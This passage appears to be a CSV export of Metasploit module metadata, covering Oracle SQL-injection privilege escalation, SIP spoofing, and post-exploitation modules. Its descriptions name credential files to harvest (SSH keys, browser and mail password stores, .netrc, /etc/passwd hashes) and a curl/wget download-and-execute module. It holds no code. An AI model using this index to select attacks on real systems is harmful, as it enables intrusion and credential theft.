injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU.","Metasploit Framework License (BSD)","f","2008-10-22 00:00:00",,,"aggressive","t","CVE-2008-3996, OSVDB-49321, URL-http://www.appsecinc.com/resources/alerts/oracle/2008-08.shtml","MC " 1790,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb","auxiliary","sqli/oracle/dbms_cdc_publish","auxiliary/sqli/oracle/dbms_cdc_publish","Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE",300,"The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU.","Metasploit Framework License (BSD)","f","2008-10-22 00:00:00",,,"aggressive","t","CVE-2008-3995, OSVDB-49320, URL-http://www.appsecinc.com/resources/alerts/oracle/2008-09.shtml","MC " 1791,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb","auxiliary","sqli/oracle/dbms_cdc_publish2","auxiliary/sqli/oracle/dbms_cdc_publish2","Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE",300,"The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege.","Metasploit Framework License (BSD)","f","2010-04-26 00:00:00",,,"aggressive","t","CVE-2010-0870, OSVDB-63772, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html","MC " 1792,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb","auxiliary","sqli/oracle/dbms_cdc_publish3","auxiliary/sqli/oracle/dbms_cdc_publish3","Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET",300,"The module exploits an sql injection flaw in the CREATE_CHANGE_SET procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege.","Metasploit Framework License (BSD)","f","2010-10-13 00:00:00",,,"aggressive","t","CVE-2010-2415, OSVDB-70078, URL-http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html","MC " 1793,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb","auxiliary","sqli/oracle/dbms_cdc_subscribe_activate_subscription","auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription","Oracle DB SQL Injection via SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION",300,"This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package/function. This vulnerability affects to Oracle Database Server 9i up to 9.2.0.5 and 10g up to 10.1.0.4.","Metasploit Framework License (BSD)","f","2005-04-18 00:00:00",,,"aggressive","t","BID-13236, CVE-2005-4832, OSVDB-15553, URL-http://www.appsecinc.com/resources/alerts/oracle/2005-02.html, URL-http://www.argeniss.com/research/OraDBMS_CDC_SUBSCRIBEExploit.txt","Esteban Martinez Fayo, juan vazquez " 1794,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_export_extension.rb","auxiliary","sqli/oracle/dbms_export_extension","auxiliary/sqli/oracle/dbms_export_extension","Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION",300,"This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This module has been tested against 9i, 10gR1 and 10gR2.","Metasploit Framework License (BSD)","f","2006-04-26 00:00:00",,,"aggressive","t","BID-17699, CVE-2006-2081, OSVDB-25002, URL-http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html","MC " 1795,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb","auxiliary","sqli/oracle/dbms_metadata_get_granted_xml","auxiliary/sqli/oracle/dbms_metadata_get_granted_xml","Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML",300,"This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.","Metasploit Framework License (BSD)","f","2008-01-05 00:00:00",,,"aggressive","t","URL-http://www.metasploit.com","MC " 1796,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb","auxiliary","sqli/oracle/dbms_metadata_get_xml","auxiliary/sqli/oracle/dbms_metadata_get_xml","Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML",300,"This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.DBMS_METADATA.GET_XML package/function.","Metasploit Framework License (BSD)","f","2008-01-05 00:00:00",,,"aggressive","t","URL-http://www.metasploit.com","MC " 1797,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb","auxiliary","sqli/oracle/dbms_metadata_open","auxiliary/sqli/oracle/dbms_metadata_open","Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN",300,"This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.DBMS_METADATA.OPEN package/function.","Metasploit Framework License (BSD)","f","2008-01-05 00:00:00",,,"aggressive","t","URL-http://www.metasploit.com","MC " 1798,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/droptable_trigger.rb","auxiliary","sqli/oracle/droptable_trigger","auxiliary/sqli/oracle/droptable_trigger","Oracle DB SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger",300,"This module will escalate a Oracle DB user to MDSYS by exploiting an sql injection bug in the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using ""CREATE ANY TRIGGER"" privilege given to MDSYS user by creating evil trigger in system scheme (2-stage attack).","Metasploit Framework License (BSD)","f","2009-01-13 00:00:00",,,"aggressive","t","CVE-2008-3979, OSVDB-51354, URL-http://www.ngssoftware.com/, URL-http://www.securityfocus.com/archive/1/500061","Sh2kerr " 1799,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb","auxiliary","sqli/oracle/jvm_os_code_10g","auxiliary/sqli/oracle/jvm_os_code_10g","Oracle DB 10gR2, 11gR1/R2 DBMS_JVM_EXP_PERMS OS Command Execution",300,"This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only)","Metasploit Framework License (BSD)","f","2010-02-01 00:00:00",,,"aggressive","t","CVE-2010-0866, OSVDB-62184, URL-http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield, URL-http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/","sid " 1800,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb","auxiliary","sqli/oracle/jvm_os_code_11g","auxiliary/sqli/oracle/jvm_os_code_11g","Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution",300,"This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield. Works on 11g R1 and R2 (Windows only).","Metasploit Framework License (BSD)","f","2010-02-01 00:00:00",,,"aggressive","t","CVE-2010-0866, OSVDB-62184, URL-http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield, URL-http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/","sid " 1801,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb","auxiliary","sqli/oracle/lt_compressworkspace","auxiliary/sqli/oracle/lt_compressworkspace","Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE",300,"This module exploits an sql injection flaw in the COMPRESSWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.","Metasploit Framework License (BSD)","f","2008-10-13 00:00:00",,,"aggressive","t","CVE-2008-3982, OSVDB-49324, URL-http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html","CG " 1802,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb","auxiliary","sqli/oracle/lt_findricset_cursor","auxiliary/sqli/oracle/lt_findricset_cursor","Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method",300,"This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.LT.FINDRICSET package via Evil Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007.","Metasploit Framework License (BSD)","f","2007-10-17 00:00:00",,,"aggressive","t","BID-26098, CVE-2007-5511, OSVDB-40079, URL-http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.sql, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html","CG " 1803,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb","auxiliary","sqli/oracle/lt_mergeworkspace","auxiliary/sqli/oracle/lt_mergeworkspace","Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE",300,"This module exploits an sql injection flaw in the MERGEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.","Metasploit Framework License (BSD)","f","2008-10-22 00:00:00",,,"aggressive","t","CVE-2008-3983, OSVDB-49325, URL-http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml, URL-http://www.dsecrg.com/pages/expl/show.php?id=23, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html","CG " 1804,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb","auxiliary","sqli/oracle/lt_removeworkspace","auxiliary/sqli/oracle/lt_removeworkspace","Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE",300,"This module exploits an sql injection flaw in the REMOVEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.","Metasploit Framework License (BSD)","f","2008-10-13 00:00:00",,,"aggressive","t","CVE-2008-3984, OSVDB-49326, URL-http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml","Sh2kerr " 1805,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb","auxiliary","sqli/oracle/lt_rollbackworkspace","auxiliary/sqli/oracle/lt_rollbackworkspace","Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE",300,"This module exploits an sql injection flaw in the ROLLBACKWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.","Metasploit Framework License (BSD)","f","2009-05-04 00:00:00",,,"aggressive","t","CVE-2009-0978, OSVDB-53734, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html","MC " 1806,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/voip/asterisk_login.rb","auxiliary","voip/asterisk_login","auxiliary/voip/asterisk_login","Asterisk Manager Login Utility",300,"This module attempts to authenticate to an Asterisk Manager service. Please note that by default, Asterisk Call Management (port 5038) only listens locally, but this can be manually configured in file /etc/asterisk/manager.conf by the admin on the victim machine.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.asterisk.org/astdocs/node201.html","Alligator Security Team " 1807,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/voip/sip_deregister.rb","auxiliary","voip/sip_deregister","auxiliary/voip/sip_deregister","SIP Deregister Extension",300,"This module will will attempt to deregister a SIP user from the provider. It has been tested successfully when the sip provider/server doesn't use REGISTER authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"ChrisJohnRiley" 1808,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/voip/sip_invite_spoof.rb","auxiliary","voip/sip_invite_spoof","auxiliary/voip/sip_invite_spoof","SIP Invite Spoof",300,"This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"ChrisJohnRiley, David Maynor " 1809,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb","auxiliary","vsploit/malware/dns/dns_mariposa","auxiliary/vsploit/malware/dns/dns_mariposa","VSploit Mariposa DNS Query Module",300,"This module queries known Mariposa Botnet DNS records.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.defintel.com/docs/Mariposa_Analysis.pdf","MJC" 1810,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/vsploit/malware/dns/dns_query.rb","auxiliary","vsploit/malware/dns/dns_query","auxiliary/vsploit/malware/dns/dns_query","VSploit DNS Beaconing Emulation",300,"This module takes a list and emulates malicious DNS beaconing.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"MJC" 1811,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb","auxiliary","vsploit/malware/dns/dns_zeus","auxiliary/vsploit/malware/dns/dns_zeus","VSploit Zeus DNS Query Module",300,"This module queries known Zeus Botnet DNS records.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-https://zeustracker.abuse.ch/blocklist.php?download=domainblocklist","MJC" 1812,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/vsploit/pii/email_pii.rb","auxiliary","vsploit/pii/email_pii","auxiliary/vsploit/pii/email_pii","VSploit Email PII",300,"This auxiliary reads from a file and sends data which should be flagged via an internal or external SMTP server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"willis" 1813,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/vsploit/pii/web_pii.rb","auxiliary","vsploit/pii/web_pii","auxiliary/vsploit/pii/web_pii","VSploit Web PII",300,"This module emulates a webserver leaking PII data","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.metasploit.com","MJC" 1814,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/aix/hashdump.rb","post","aix/hashdump","post/aix/hashdump","AIX Gather Dump Password Hashes",300,"Post Module to dump the password hashes for all users on an AIX System","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1815,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/cisco/gather/enum_cisco.rb","post","cisco/gather/enum_cisco","post/cisco/gather/enum_cisco","Gather Cisco Device General Information",300,"This module collects a Cisco IOS or NXOS device information and configuration.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1816,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/checkvm.rb","post","linux/gather/checkvm","post/linux/gather/checkvm","Linux Gather Virtual Environment Detection",300,"This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1817,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/enum_configs.rb","post","linux/gather/enum_configs","post/linux/gather/enum_configs","Linux Gather Configurations",300,"This module collects configuration files found on commonly installed applications and services, such as Apache, MySQL, Samba, Sendmail, etc. If a config file is found in its default path, the module will assume that is the file we want.","Metasploit Framework License (BSD)","f",,,,,"t",,"ohdae " 1818,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/enum_network.rb","post","linux/gather/enum_network","post/linux/gather/enum_network","Linux Gather Network Information",300,"This module gathers network information from the target system IPTables rules, interfaces, wireless information, open and listening ports, active network connections, DNS information and SSH information.","Metasploit Framework License (BSD)","f",,,,,"t",,"Stephen Haywood , ohdae " 1819,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/enum_protections.rb","post","linux/gather/enum_protections","post/linux/gather/enum_protections","Linux Gather Protection Enumeration",300,"This module tries to find certain installed applications that can be used to prevent, or detect our attacks, which is done by locating certain binary locations, and see if they are indeed executables. For example, if we are able to run 'snort' as a command, we assume it's one of the files we are looking for. This module is meant to cover various antivirus, rootkits, IDS/IPS, firewalls, and other software.","Metasploit Framework License (BSD)","f",,,,,"t",,"ohdae " 1820,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/enum_system.rb","post","linux/gather/enum_system","post/linux/gather/enum_system","Linux Gather System and User Information",300,"This module gathers system information. We collect installed packages, installed services, mount information, user list, user bash history and cron jobs","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , Stephen Haywood , ohdae , sinn3r " 1821,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/enum_users_history.rb","post","linux/gather/enum_users_history","post/linux/gather/enum_users_history","Linux Gather User History",300,"This module gathers user specific information. User list, bash history, mysql history, vim history, lastlog and sudoers.","Metasploit Framework License (BSD)","f",,,,,"t",,"ohdae " 1822,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/enum_xchat.rb","post","linux/gather/enum_xchat","post/linux/gather/enum_xchat","Linux Gather XChat Enumeration",300,"This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1823,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/hashdump.rb","post","linux/gather/hashdump","post/linux/gather/hashdump","Linux Gather Dump Password Hashes for Linux Systems",300,"Post Module to dump the password hashes for all users on a Linux System","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1824,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/mount_cifs_creds.rb","post","linux/gather/mount_cifs_creds","post/linux/gather/mount_cifs_creds","Linux Gather Saved mount.cifs/mount.smbfs Credentials",300,"Post Module to obtain credentials saved for mount.cifs/mount.smbfs in /etc/fstab on a Linux system.","Metasploit Framework License (BSD)","f",,,,,"t",,"Jon Hart " 1825,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/gather/pptpd_chap_secrets.rb","post","linux/gather/pptpd_chap_secrets","post/linux/gather/pptpd_chap_secrets","Linux Gather PPTP VPN chap-secrets Credentials",300,"This module collects PPTP VPN information such as client, server, password, and IP from your target server's chap-secrets file.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1826,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/linux/manage/download_exec.rb","post","linux/manage/download_exec","post/linux/manage/download_exec","Linux Manage Download and Exececute",300,"This module downloads and runs a file with bash. It first tries to uses curl as its HTTP client and then wget if it's not found. Bash found in the PATH is used to execute the file.","Metasploit Framework License (BSD)","f",,,,,"t",,"Joshua D. Abraham " 1827,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/escalate/metasploit_pcaplog.rb","post","multi/escalate/metasploit_pcaplog","post/multi/escalate/metasploit_pcaplog","Metasploit pcap_log Local Privilege Escalation",0,"Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings, creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within. This, and all the other packets, are appended to /etc/passwd. Successful exploitation results in the creation of a new superuser account. This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap files and truncate /etc/passwd. Note that if this module fails, you can potentially induce a permanent DoS on the target by corrupting the /etc/passwd file.","Metasploit Framework License (BSD)","f","2012-07-16 00:00:00",,,,"t","BID-54472, URL-http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html, URL-https://community.rapid7.com/docs/DOC-1946","0a29406d9794e4f9b30b3c5d6702c708" 1828,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/apple_ios_backup.rb","post","multi/gather/apple_ios_backup","post/multi/gather/apple_ios_backup","Windows Gather Apple iOS MobileSync Backup File Collection",300,"This module will collect sensitive files from any on-disk iOS device backups","Metasploit Framework License (BSD)","f",,,,,"t",,"bannedit , hdm " 1829,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/dns_bruteforce.rb","post","multi/gather/dns_bruteforce","post/multi/gather/dns_bruteforce","Multi Gather DNS Forward Lookup Bruteforce",300,"Brute force subdomains and hostnames via wordlist.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1830,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/dns_reverse_lookup.rb","post","multi/gather/dns_reverse_lookup","post/multi/gather/dns_reverse_lookup","Multi Gather DNS Reverse Lookup Scan",300,"Performs DNS reverse lookup using the OS included DNS query command.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1831,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/dns_srv_lookup.rb","post","multi/gather/dns_srv_lookup","post/multi/gather/dns_srv_lookup","Multi Gather DNS Service Record Lookup Scan",300,"Enumerates know SRV Records for a given domaon using target host DNS query tool.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1832,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/enum_vbox.rb","post","multi/gather/enum_vbox","post/multi/gather/enum_vbox","Multi Gather VirtualBox VM Enumeration",300,"This module will attempt to enumerate any VirtualBox VMs on the target machine. Due to the nature of VirtualBox, this module can only enumerate VMs registered for the current user, thereforce, this module needs to be invoked from a user context.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1833,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/env.rb","post","multi/gather/env","post/multi/gather/env","Multi Gather Generic Operating System Environment Settings",300,"This module prints out the operating system environment variables","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , egypt " 1834,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/fetchmailrc_creds.rb","post","multi/gather/fetchmailrc_creds","post/multi/gather/fetchmailrc_creds","UNIX Gather .fetchmailrc Credentials",300,"Post Module to obtain credentials saved for IMAP, POP and other mail retrieval protocols in fetchmail's .fetchmailrc","Metasploit Framework License (BSD)","f",,,,,"t",,"Jon Hart " 1835,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/filezilla_client_cred.rb","post","multi/gather/filezilla_client_cred","post/multi/gather/filezilla_client_cred","Multi Gather FileZilla FTP Client Credential Collection",300,"This module will collect credentials from the FileZilla FTP client if it is installed.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , bannedit " 1836,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/find_vmx.rb","post","multi/gather/find_vmx","post/multi/gather/find_vmx","Multi Gather VMWare VM Identification",300,"This module will attempt to find any VMWare virtual machines stored on the target.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1837,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/firefox_creds.rb","post","multi/gather/firefox_creds","post/multi/gather/firefox_creds","Multi Gather Firefox Signon Credential Collection",300,"This module will collect credentials from the Firefox web browser if it is installed on the targeted machine. Additionally, cookies are downloaded. Which could potentially yield valid web sessions. Firefox stores passwords within the signons.sqlite database file. There is also a keys3.db file which contains the key for decrypting these passwords. In cases where a Master Password has not been set, the passwords can easily be decrypted using third party tools. If a Master Password was used the only option would be to bruteforce.","Metasploit Framework License (BSD)","f",,,,,"t",,"bannedit " 1838,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/gpg_creds.rb","post","multi/gather/gpg_creds","post/multi/gather/gpg_creds","Multi Gather GnuPG Credentials Collection",300,"This module will collect the contents of user's .gnupg directory on the targeted machine. Password protected secret keyrings can be cracked with JtR.","Metasploit Framework License (BSD)","f",,,,,"t",,"Dhiru Kholia " 1839,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/multi_command.rb","post","multi/gather/multi_command","post/multi/gather/multi_command","Multi Gather Run Shell Command Resource File",300,"This module will read shell commands from a resource file and execute the commands in the specified Meterpreter or shell session.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1840,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/netrc_creds.rb","post","multi/gather/netrc_creds","post/multi/gather/netrc_creds","UNIX Gather .netrc Credentials",300,"Post Module to obtain credentials saved for FTP and other services in .netrc","Metasploit Framework License (BSD)","f",,,,,"t",,"Jon Hart " 1841,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/pgpass_creds.rb","post","multi/gather/pgpass_creds","post/multi/gather/pgpass_creds","Multi Gather pgpass Credentials",300,"This module will collect the contents of user's .pgpass or pgpass.conf and parse them for credentials.","Metasploit Framework License (BSD)","f",,,,,"t",,"Zach Grace " 1842,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/pidgin_cred.rb","post","multi/gather/pidgin_cred","post/multi/gather/pidgin_cred","Multi Gather Pidgin Instant Messenger Credential Collection",300,"This module will collect credentials from the Pidgin IM client if it is installed.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , bannedit " 1843,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/ping_sweep.rb","post","multi/gather/ping_sweep","post/multi/gather/ping_sweep","Multi Gather Ping Sweep",300,"Performs IPv4 ping sweep using the OS included ping command.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1844,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/run_console_rc_file.rb","post","multi/gather/run_console_rc_file","post/multi/gather/run_console_rc_file","Multi Gather Run Console Resource File",300,"This module will read console commands from a resource file and execute the commands in the specified Meterpreter session.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1845,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/skype_enum.rb","post","multi/gather/skype_enum","post/multi/gather/skype_enum","Multi Gather Skype User Data Enumeration",300,"This module will enumerate Skype account settings, contact list, call history, chat logs, file transfer history, and voicemail logs, saving all the data to CSV files for analysis.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1846,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/ssh_creds.rb","post","multi/gather/ssh_creds","post/multi/gather/ssh_creds","Multi Gather OpenSSH PKI Credentials Collection",300,"This module will collect the contents of user's .ssh directory on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.","Metasploit Framework License (BSD)","f",,,,,"t",,"Jim Halfpenny" 1847,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/gather/thunderbird_creds.rb","post","multi/gather/thunderbird_creds","post/multi/gather/thunderbird_creds","Multi Gather Mozilla Thunderbird Signon Credential Collection",300,"This module will collect credentials from Mozilla Thunderbird by downloading the necessary files such as 'signons.sqlite', 'key3.db', and 'cert8.db' for offline decryption with third party tools. If necessary, you may also set the PARSE optioin to true to parse the sqlite file, which contains sensitive information such as the encrypted username/password. However, this feature is not enabled by default, because it requires SQLITE3 gem to be installed on your machine.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1848,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/general/close.rb","post","multi/general/close","post/multi/general/close","Multi Generic Operating System Session Close",300,"This module closes the specified session. This can be useful as a finisher for automation tasks","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 1849,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/general/execute.rb","post","multi/general/execute","post/multi/general/execute","Multi Generic Operating System Session Command Execution",300,"This module executes an arbitrary command 